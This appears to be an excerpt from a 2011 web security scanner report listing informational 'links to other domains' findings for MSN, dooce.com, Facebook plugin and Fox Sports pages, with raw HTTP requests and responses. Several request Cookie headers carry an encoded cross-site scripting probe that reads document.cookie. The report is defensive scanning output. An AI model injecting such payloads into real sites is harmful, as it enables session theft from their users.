<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>

<script language="javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&type=website&buttonText=&embeds=true&post_services=facebook%2Ctwitter%2Cdelicious%2Cstumbleupon%2Cmyspace%2Cdigg%2Creddit%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin%2Ctechnorati%2Cmixx%2Cybuzz%2Cfriendfeed&linkfg=%23668c1f&offsetLeft=-180;onmouseover=false"></script>
...[SNIP]...

   <script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
   <script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js"></script>
...[SNIP]...
<span class="msnlogo_top">
<a href="http://www.redacted">
<img src="/cm/delish/tmpl_images/header/msn_partner_slimline.png" title="go to redacted" alt="go to redacted" id="msnlogo" />
...[SNIP]...
<li class="c1">
<a href="http://www.msnbc.redacted/">News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032076/ns/health">Health News</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx">Local News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3096434/ns/msnbc_tv">MSNBC TV</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032553/ns/politics">Politics</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032118/ns/technology_and_science">Tech & Science</a>
...[SNIP]...
<li><a href="http://today.msnbc.redacted/">Today Show</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032525/ns/us_news">US News</a>
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li><a href="http://local.msn.com/weather.aspx">Weather</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032507/ns/world_news">World News</a>
...[SNIP]...
<li class="c2">
<a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li><a href="http://wonderwall.redacted/">Celebrities</a>
...[SNIP]...
<li><a href="http://entertainment.redacted/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a>
...[SNIP]...
<li><a href="http://movies.msn.com/">Movies</a>
...[SNIP]...
<li><a href="http://music.msn.com/">Music</a>
...[SNIP]...
<li><a href="http://entertainment.redacted/superfans/">Superfans</a>
...[SNIP]...
<li><a href="http://tv.redacted/">TV</a>
...[SNIP]...
<li><a href="http://entertainment.redacted/video/">Video</a>
...[SNIP]...
<li class="c3">
<a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video ">Video</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/name/public/siteIndex">More</a>
...[SNIP]...
<li class="c4">
<a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li><a href="http://autos.msn.com/">Autos</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/investor/home.aspx">Investing</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate</a>
...[SNIP]...
<li><a href="http://articles.redacted/video/default.aspx ">Video</a>
...[SNIP]...
<li class="c5">
<a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li><a href="http://health.msn.com/diet-and-fitness.aspx">Diet & Fitness</a>
...[SNIP]...
<li><a href="http://health.msn.com/">Health</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS">Horoscopes</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269">Online Dating</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-look/video/ ">Video</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-home/">Your Home</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-life/ ">Your Life</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-look/">Your Look </a>
...[SNIP]...
<li class="c6 last">
<a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li><a href="http://autos.msn.com/">Autos</a>
...[SNIP]...
<li><a href="http://my.redacted/">My MSN</a>
...[SNIP]...
<li><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a>
...[SNIP]...
<li><a href="http://careers.msn.com/">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a>
...[SNIP]...
<li><a href="http://local.msn.com/weather.aspx">Weather</a>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="http://wonderwall.redacted/">Wonderwall</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted">Horoscopes</a>
...[SNIP]...
<li><a href="http://tech.redacted/">Tech & Gadgets</a>
...[SNIP]...
<li><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://local.msn.com/gas-traffic.aspx">Traffic</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo">
<a href="http://www.bing.com/search?FORM=DELISH">Bing</a>
...[SNIP]...
<li><a href="http://hotmail.msn.com">Hotmail</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div id="makehome">
           <a href="http://www.myhomeredacted/" id="hplink">Make redacted your home page</a>
...[SNIP]...
<span class=" last"><a href="http://www.pingg.com/account/products/create_invite?customize=delish&design_category_to_open=delish&partner=delish">Invitations & eCards</a>
...[SNIP]...
<p>For the last several days<a href="http://www.boingboing.net/2011/01/24/frozen-pizza-and-fro.html" target="_blank"> rumors have been circling</a> the
Internet that <a href="http://www.digiorno.com/" target="_blank">DiGiorno </a>
...[SNIP]...
<p>But a check of the pizza purveyor's <a href="http://www.facebook.com/digiorno#!/digiorno?v=wall" target="_blank">Facebook page</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/home/home">Advertise Online</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank">MSN Privacy Policy</a>
...[SNIP]...
<li><a href="http://g.redacted/0TO_/enus" target="_blank">Legal</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/home/home.asp">Advertise</a>
...[SNIP]...
<li class="last"><a href="http://privacy.microsoft.com/en-us/fullnotice.mspx#EBG">About our ads</a>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://analytics.live.com/Analytics/wlAnalytics.js"></script>
...[SNIP]...
<noscript><img src="http://hearstmagazines.112.2o7.net/b/ss/hmagglobal/1/H.22.1--NS/0"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
</script>
<script src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dooce.com
Path:	/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.redacted\|msn.com/wonderwall\|v14.msn.com/\|preview.redacted/\|www.redacted/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The page was loaded from a URL containing a query string:

http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/?\w+|mtv.com/$|mtv.com/ontv/\?\w+|mtv.com/ontv/$|http://www.pcmag.com/&|http://www.pcmag.com/reviews|http://www.pcmag.com/category2/0,2806,24,00.asp|http://www.pcmag.com/category2/0,2806,9,00.asp|http://www.pcmag.com/category2/0,2806,4829,00.asp|http://www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http://www.terra.com.mx/default.htm|http://www.terra.com/$|www.people.com/$|http://www.walmart.com/|http://www.walmart.com/cp/toys/4171|http://www.walmart.com/cp/Electronics/3944

The response contains the following links to other domains:

http://advertisers.federatedmedia.net/plan.php?site=dooce
http://books.simonandschuster.com/buy/It-Sucked-and-Then-I-Cried/9781416936015/from-other-retailers
http://drupal.org/
http://flickr.com/photos/dooce/
http://search.barnesandnoble.com/It-Sucked-and-Then-I-Cried/Heather-Armstrong/e/9781416936015/?itm=1&afsrc=1&lkid=J27409269&pubid=K193348&byo=1
http://search.barnesandnoble.com/Things-I-Learned-about-My-Dad/Heather-B-Armstrong/e/9780758216595/?itm=1&afsrc=1&lkid=J27409285&pubid=K193348&byo=1
http://static.fmpub.net/zone/2555
http://static.fmpub.net/zone/936
http://twitter.com/dooce
http://www.amazon.com/gp/product/0758216599?ie=UTF8&tag=dooce-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=0758216599
http://www.amazon.com/gp/product/1416936017?ie=UTF8&tag=dooce-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=1416936017
http://www.assoc-amazon.com/e/ir?t=dooce-20&l=as2&o=1&a=0758216599
http://www.assoc-amazon.com/e/ir?t=dooce-20&l=as2&o=1&a=1416936017
http://www.liquidweb.com/?RID=dooce

Request

GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/?\w+|mtv.com/$|mtv.com/ontv/\?\w+|mtv.com/ontv/$|http://www.pcmag.com/&|http://www.pcmag.com/reviews|http://www.pcmag.com/category2/0,2806,24,00.asp|http://www.pcmag.com/category2/0,2806,9,00.asp|http://www.pcmag.com/category2/0,2806,4829,00.asp|http://www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http://www.terra.com.mx/default.htm|http://www.terra.com/$|www.people.com/$|http://www.walmart.com/|http://www.walmart.com/cp/toys/4171|http://www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.dooce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:52:34 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: SESS30952fbaf4ac11922b9cafbdf8d115e4=63030eb63e5bd76c6ee5ed01bf8dd4c8; expires=Tue, 22-Feb-2011 05:25:54 GMT; path=/; domain=.dooce.com
Last-Modified: Sun, 30 Jan 2011 01:51:22 GMT
ETag: "3667780cc336028c46b22ca6d19246cc"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/zone/2555'></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/zone/936'></script>
...[SNIP]...
<p><a href="http://www.amazon.com/gp/product/1416936017?ie=UTF8&tag=dooce-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=1416936017">Amazon</a><img src="http://www.assoc-amazon.com/e/ir?t=dooce-20&l=as2&o=1&a=1416936017" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" />
</p>
<p><a href="http://search.barnesandnoble.com/It-Sucked-and-Then-I-Cried/Heather-Armstrong/e/9781416936015/?itm=1&afsrc=1&lkid=J27409269&pubid=K193348&byo=1">Barnes & Noble</a>
...[SNIP]...
<p><a href="http://books.simonandschuster.com/buy/It-Sucked-and-Then-I-Cried/9781416936015/from-other-retailers#book_retailers">Other Vendors</a>
...[SNIP]...
<p><a href="http://www.amazon.com/gp/product/0758216599?ie=UTF8&tag=dooce-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=0758216599">Amazon</a><img src="http://www.assoc-amazon.com/e/ir?t=dooce-20&l=as2&o=1&a=0758216599" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" />
</p>
<p><a href="http://search.barnesandnoble.com/Things-I-Learned-about-My-Dad/Heather-B-Armstrong/e/9780758216595/?itm=1&afsrc=1&lkid=J27409285&pubid=K193348&byo=1">Barnes & Noble</a>
...[SNIP]...
<li><a href="http://flickr.com/photos/dooce/">flickr</a></li>
<li><a href="http://twitter.com/dooce">Twitter</a>
...[SNIP]...
<p>.. 2001 - 2011 Armstrong Media, LLC. All rights reserved. Powered by <a href="http://drupal.org">Drupal</a>. Hosted by <a href="http://www.liquidweb.com/?RID=dooce">Liquidweb</a>
...[SNIP]...
<img src="/sites/all/themes/dooce/images/footer-fm_small.gif" width="17" height="12" alt="Footer FM badge" style="margin-left:15px;margin-top:3px;" border="0"> FM Living <a href="http://advertisers.federatedmedia.net/plan.php?site=dooce">Advertise on dooce..</a>
...[SNIP]...

22.418. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FTechnolog%2F108546889203630

The response contains the following links to other domains:

http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js
http://static.ak.fbcdn.net/rsrc.php/yy/r/XJ7kiAXTdg6.css

Request

GET /plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FTechnolog%2F108546889203630 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

22.419. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js
http://static.ak.fbcdn.net/rsrc.php/yc/r/JJt3yB2LDLj.css

Request

Response

22.420. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Ftodayshow%3Fref%3Dts&width=230&connections=0&stream=false&header=false&height=70

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yT/r/9lPyO_dICNw.css
http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js
http://e.static.ak.fbcdn.net/rsrc.php/yo/r/wqv1o-EUF6N.css
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs174.ash2/41796_12566691349_5235509_q.jpg

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Ftodayshow%3Fref%3Dts&width=230&connections=0&stream=false&header=false&height=70 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

22.421. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FLifeIncBlog&width=220&colorscheme=light&connections=00&stream=false&header=false&height=60

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yT/r/9lPyO_dICNw.css
http://c.static.ak.fbcdn.net/rsrc.php/y4/r/dEWxw0CYkCs.css
http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js
http://e.static.ak.fbcdn.net/rsrc.php/yo/r/wqv1o-EUF6N.css

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FLifeIncBlog&width=220&colorscheme=light&connections=00&stream=false&header=false&height=60 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

22.422. http://www.facebook.com/sharer.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sharer.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/sharer.php?u={0}&t={1}%3a+{2}

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css
http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yT/r/9lPyO_dICNw.css
http://d.static.ak.fbcdn.net/rsrc.php/yS/r/dXr3z4t4Z9u.css
http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js
http://e.static.ak.fbcdn.net/rsrc.php/yR/r/3ltOPQgcfkx.css
http://static.ak.fbcdn.net/rsrc.php/ya/r/035cJZ3XnJP.css
http://static.ak.fbcdn.net/rsrc.php/ye/r/ZveyUJsCpv8.css

Request

GET /sharer.php?u={0}&t={1}%3a+{2} HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=CnwRb; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php%3Fu%3D%257B0%257D%26t%3D%257B1%257D%253A%2B%257B2%257D; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php%3Fu%3D%257B0%257D%26t%3D%257B1%257D%253A%2B%257B2%257D; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 01:53:01 GMT
Content-Length: 10749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yT/r/9lPyO_dICNw.css" />
<link type="text/css" rel="stylesheet" href="http://d.static.ak.fbcdn.net/rsrc.php/yS/r/dXr3z4t4Z9u.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/ye/r/ZveyUJsCpv8.css" />
<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/yR/r/3ltOPQgcfkx.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/ya/r/035cJZ3XnJP.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/yM/r/6hIcCnDV7Kr.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...

22.423. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foxsportsarizona.com
Path:	/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&feedID=3698&gt1=39002

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/rsn.arizona/landing;tile=3;sz=300x250;ord=1296406997?
http://ad.doubleclick.net/ad/rsn.arizona/landing;tile=3;sz=728x90;ord=1296406997?
http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=300x250;ord=1296406997?
http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=728x90;ord=1296406997?
http://ad.doubleclick.net/jump/rsn.arizona/landing;tile=3;sz=300x250;ord=1296406997?
http://ad.doubleclick.net/jump/rsn.arizona/landing;tile=3;sz=728x90;ord=1296406997?
http://advertising.msn.com/msn/
http://articles.redacted/video/default.aspx?from=en-us_msnhp
http://astrocenter.astrology.redacted/
http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS
http://autos.redacted/
http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1
http://blstc.redacted/br/gbl/css/10/decoration/logo_sm_msn_rev24.png
http://blstj.redacted/br/chan/mops/js/foxsportsheader/core.js
http://blstj.redacted/br/gbl/js/4/mozcompat.js
http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js
http://blstj.redacted/br/gbl/js/7/navigation.js
http://careers.redacted/
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670268
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670269
http://entertainment.msn.com/
http://entertainment.msn.com/news/?ipp=15
http://entertainment.msn.com/video/?from=en-us_msnhp
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0017&btnGo=Go&report=roster
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0017&btnGo=Go&report=schedule
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0017&btnGo=Go&report=stats
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0018&btnGo=Go&report=roster
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0018&btnGo=Go&report=schedule
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0018&btnGo=Go&report=stats
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0405&btnGo=Go&report=roster
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0405&btnGo=Go&report=schedule
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0405&btnGo=Go&report=stats
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0420&btnGo=Go&report=roster
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0420&btnGo=Go&report=schedule
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0420&btnGo=Go&report=stats
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0041&btnGo=Go&report=roster
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0041&btnGo=Go&report=schedule
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0041&btnGo=Go&report=stats
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0057&btnGo=Go&report=roster
